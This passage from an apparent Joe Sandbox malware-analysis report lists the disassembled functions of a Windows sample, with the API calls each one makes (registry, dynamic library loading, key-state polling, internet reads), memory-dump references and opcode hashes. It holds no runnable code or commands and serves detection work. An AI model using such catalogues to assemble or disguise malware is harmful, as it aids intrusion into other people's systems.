                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 0096BBA6
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0096BBB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 826366716-0
                                                                    • Opcode ID: 4a0f262cdbe0a7194bd35e85f7f8860695b8bfd8e44d0b93b36706eb8d66a3cc
                                                                    • Instruction ID: 41ffa0ac3c58f5a31d5c35a934f2591b661aa18d6d438e29b8bfcbc774874026
                                                                    • Opcode Fuzzy Hash: 4a0f262cdbe0a7194bd35e85f7f8860695b8bfd8e44d0b93b36706eb8d66a3cc
                                                                    • Instruction Fuzzy Hash: 6861A571208241EFD714DF64C490E2ABBE9FF85308F54895DF4998B2A2DB31ED85CB92
                                                                    Function 00948BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00948BCD
                                                                    • VariantClear.OLEAUT32 ref: 00948C3E
                                                                    • VariantClear.OLEAUT32 ref: 00948C9D
                                                                    • VariantClear.OLEAUT32(?), ref: 00948D10
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00948D3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                    • String ID:
                                                                    • API String ID: 4136290138-0
                                                                    • Opcode ID: 3cf852498a87d3268a28c43d461dc22e1316ffeb8ae49efcf3658e20dc8faabb
                                                                    • Instruction ID: ffd74cbd23f28520895da62d29f543abdc9f365aeadb25c0ba12d4846798491c
                                                                    • Opcode Fuzzy Hash: 3cf852498a87d3268a28c43d461dc22e1316ffeb8ae49efcf3658e20dc8faabb
                                                                    • Instruction Fuzzy Hash: 3B5166B5A11219EFCB14CF68C884EAAB7F9FF89314B158569E909DB350E730E911CF90
                                                                    Function 00958AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00958BAE
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00958BDA
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00958C32
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00958C57
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00958C5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                    • String ID:
                                                                    • API String ID: 2832842796-0
                                                                    • Opcode ID: a1b81c96fc66417708e47e14ad1a956557086d5ef97eb7647e3a113128bb4acf
                                                                    • Instruction ID: 66eb0723636257dc6f377df85f4e3a44e70e1f3f7b7e059845dac0e0a6d25ba7
                                                                    • Opcode Fuzzy Hash: a1b81c96fc66417708e47e14ad1a956557086d5ef97eb7647e3a113128bb4acf
                                                                    • Instruction Fuzzy Hash: 9D516A75A00618AFCB00DF69C881E6EBBF5FF49314F088458E949AB362DB31ED55CB91
                                                                    Function 00968EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00968F40
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00968FD0
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00968FEC
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00969032
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00969052
                                                                      • Part of subcall function 008FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00951043,?,753CE610), ref: 008FF6E6
                                                                      • Part of subcall function 008FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0093FA64,00000000,00000000,?,?,00951043,?,753CE610,?,0093FA64), ref: 008FF70D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                    • String ID:
                                                                    • API String ID: 666041331-0
                                                                    • Opcode ID: 9b530801b5d030da46b6d97ba8388706b7607cea4ced25ca85ea21701ed36ac7
                                                                    • Instruction ID: 83f33f62c28d1a3d5f42122b8d983ae3e3bb1acf995dca8aa8e669037729f2c8
                                                                    • Opcode Fuzzy Hash: 9b530801b5d030da46b6d97ba8388706b7607cea4ced25ca85ea21701ed36ac7
                                                                    • Instruction Fuzzy Hash: F6516C75604245DFCB11DF68C4848AEBBF5FF49314B0481A8E91AAB362DB31ED86CF91
                                                                    Function 00976B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00976C33
                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00976C4A
                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00976C73
                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0095AB79,00000000,00000000), ref: 00976C98
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00976CC7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MessageSendShow
                                                                    • String ID:
                                                                    • API String ID: 3688381893-0
                                                                    • Opcode ID: 29518683dc28477fadfdf0618a55f108b876532efad19e263f6d533460b5ab88
                                                                    • Instruction ID: d8bd65c58a868f4993ae148e7125fd22bf702a0566507ddfe48353d7562d2d2c
                                                                    • Opcode Fuzzy Hash: 29518683dc28477fadfdf0618a55f108b876532efad19e263f6d533460b5ab88
                                                                    • Instruction Fuzzy Hash: 5D41E777604504AFD725CF38CD55FA57BA8EB49360F188268FADDA72E0C371AD40DA40
                                                                    Function 00912051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 2b53926a9be1023dda11871d9db60cdd6bd1150319a7a5be4906875e124b4664
                                                                    • Instruction ID: c5a4f5dcaee2ca2689019592483eb93582e0049e335b730cbc4b0dfc32732bb6
                                                                    • Opcode Fuzzy Hash: 2b53926a9be1023dda11871d9db60cdd6bd1150319a7a5be4906875e124b4664
                                                                    • Instruction Fuzzy Hash: E141D472B00208AFCB24EF78C881A9DB7E5EF89314F1545A8E615EB352DB31AD51CB81
                                                                    Function 008F912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 008F9141
                                                                    • ScreenToClient.USER32(00000000,?), ref: 008F915E
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 008F9183
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 008F919D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    • Opcode ID: 04dc9d99c4b5fba8118a0285374e87ad2de83079df2cecd65a58c1f06078ff83
                                                                    • Instruction ID: 372609fdf46f986840249a3f9afecb65ccc7f93b222083d6bb3485594fac30f4
                                                                    • Opcode Fuzzy Hash: 04dc9d99c4b5fba8118a0285374e87ad2de83079df2cecd65a58c1f06078ff83
                                                                    • Instruction Fuzzy Hash: B8415F7290C60AFBDF159FA8C844BFEB775FB05324F208229E569A2290C7346990DF91
                                                                    Function 00953874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 009538CB
                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00953922
                                                                    • TranslateMessage.USER32(?), ref: 0095394B
                                                                    • DispatchMessageW.USER32(?), ref: 00953955
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00953966
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                    • String ID:
                                                                    • API String ID: 2256411358-0
                                                                    • Opcode ID: b10e136616e899a913842398df942c622b06d3912278e73b646912fe3047a2fc
                                                                    • Instruction ID: 45bb1d557467f7a6f4c7f71bd1c91995250b20be7c7d213e9c8602aed78f7a02
                                                                    • Opcode Fuzzy Hash: b10e136616e899a913842398df942c622b06d3912278e73b646912fe3047a2fc
                                                                    • Instruction Fuzzy Hash: F631E8B051C345DFEB39CB369968BB637ECEB01392F44855DE856C20A0E7B49688DB11
                                                                    Function 0095CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CF38
                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 0095CF6F
                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFB4
                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFC8
                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,0095C21E,00000000), ref: 0095CFF2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                    • String ID:
                                                                    • API String ID: 3191363074-0
                                                                    • Opcode ID: 1cd7484854b1969efc5471bf559e9391207527e6b17f371804c4e1ba139e5151
                                                                    • Instruction ID: 508432495633dd653762fe38d44115f80a5e54342a25c66874692da89165a47c
                                                                    • Opcode Fuzzy Hash: 1cd7484854b1969efc5471bf559e9391207527e6b17f371804c4e1ba139e5151
                                                                    • Instruction Fuzzy Hash: AF317FB1604305AFDB24DFA6C8849ABBBFDFF04352B10442EF916D2101DB30ED449B60
                                                                    Function 00941901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00941915
                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 009419C1
                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 009419C9
                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 009419DA
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 009419E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: a286c5a6f86b50f3e15dc8a40ad3c192255ce75d9e8dac6e4e6035766e7cafd0
                                                                    • Instruction ID: fe1e6838e1c0f325e64d3272efd3ff774aba08150a079763539a274a42582389
                                                                    • Opcode Fuzzy Hash: a286c5a6f86b50f3e15dc8a40ad3c192255ce75d9e8dac6e4e6035766e7cafd0
                                                                    • Instruction Fuzzy Hash: 7E31C072A14219EFCB04CFA8DD99EDE3BB5EB44315F104229F925AB2D1C7709984DB90
                                                                    Function 00975706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00975745
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0097579D
                                                                    • _wcslen.LIBCMT ref: 009757AF
                                                                    • _wcslen.LIBCMT ref: 009757BA
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00975816
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 763830540-0
                                                                    • Opcode ID: 942df0691dac8faaf143383c369292fb61458ee1d6410036df732944cbd4360b
                                                                    • Instruction ID: 8b12277b6bb1fb7b13b0bf8a6a7f1b1b98bdbd5637d28e09b52daea4f56f6940
                                                                    • Opcode Fuzzy Hash: 942df0691dac8faaf143383c369292fb61458ee1d6410036df732944cbd4360b
                                                                    • Instruction Fuzzy Hash: 3121D2729046089ADB609FA0CC85AEE77BCFF40720F10C21AEA2DEA1C0D7B08981CF50
                                                                    Function 008F990E Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 008F98CC
                                                                    • SetTextColor.GDI32(?,?), ref: 008F98D6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 008F98E9
                                                                    • GetStockObject.GDI32(00000005), ref: 008F98F1
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Color$LongModeObjectStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1860813098-0
                                                                    • Opcode ID: 2cca7308e0a7a1e92971f92b2c22714d13db947240e10683488c91424a150298
                                                                    • Instruction ID: d2f90b4038722319519e87bf04b57b334fdcc00cb3c661012061e361edde8d38
                                                                    • Opcode Fuzzy Hash: 2cca7308e0a7a1e92971f92b2c22714d13db947240e10683488c91424a150298
                                                                    • Instruction Fuzzy Hash: CA21F2726992449FC7228F74EC54BF93F60EB13331B04026DEA968A1A1C7764982DB51
                                                                    Function 00960930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00960951
                                                                    • GetForegroundWindow.USER32 ref: 00960968
                                                                    • GetDC.USER32(00000000), ref: 009609A4
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 009609B0
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 009609E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    • Opcode ID: 48af42d596322861d6aff966ff588bd9b50558e3750bd2f8d0e5d52b1ee6e5b9
                                                                    • Instruction ID: dbe0de24ec2ff76db63024613189ebb2aa3f6e947fe944568d7bc7361ac94bf2
                                                                    • Opcode Fuzzy Hash: 48af42d596322861d6aff966ff588bd9b50558e3750bd2f8d0e5d52b1ee6e5b9
                                                                    • Instruction Fuzzy Hash: 58219F76600204AFD704EF69C985AAEBBE9EF85741F00842CE84AE7362CB70AD44DB50
                                                                    Function 0091CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0091CDC6
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0091CDE9
                                                                      • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0091CE0F
                                                                    • _free.LIBCMT ref: 0091CE22
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0091CE31
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: 1efa36b4a3ac340fbef68b5db0035eb72af6654fdef5d59d08fb27407d573a15
                                                                    • Instruction ID: 626ce74f738f4fc55736fc79b7a7c198e95748ace21371676416f041681a778a
                                                                    • Opcode Fuzzy Hash: 1efa36b4a3ac340fbef68b5db0035eb72af6654fdef5d59d08fb27407d573a15
                                                                    • Instruction Fuzzy Hash: A701F7F37452197F232116BA6C8DDBF7A6DDFC6BA1315012DFD09C7200EA608D8191B0
                                                                    Function 008F9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
                                                                    • SelectObject.GDI32(?,00000000), ref: 008F96A2
                                                                    • BeginPath.GDI32(?), ref: 008F96B9
                                                                    • SelectObject.GDI32(?,00000000), ref: 008F96E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    • String ID:
                                                                    • API String ID: 3225163088-0
                                                                    • Opcode ID: 534cdf23a0c076e34f33359e2667e4a3741d971f3f39b10cda10b013eb272c40
                                                                    • Instruction ID: b4fb2abca25449fdf954f9d65f4212f9867786eae23d47584dce82b1d7dfd3cc
                                                                    • Opcode Fuzzy Hash: 534cdf23a0c076e34f33359e2667e4a3741d971f3f39b10cda10b013eb272c40
                                                                    • Instruction Fuzzy Hash: D121B07182A349EBDB119F68FD247B93BA8FB20366F50031AF554E60B0D3745881EF94
                                                                    Function 00945711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    APIs
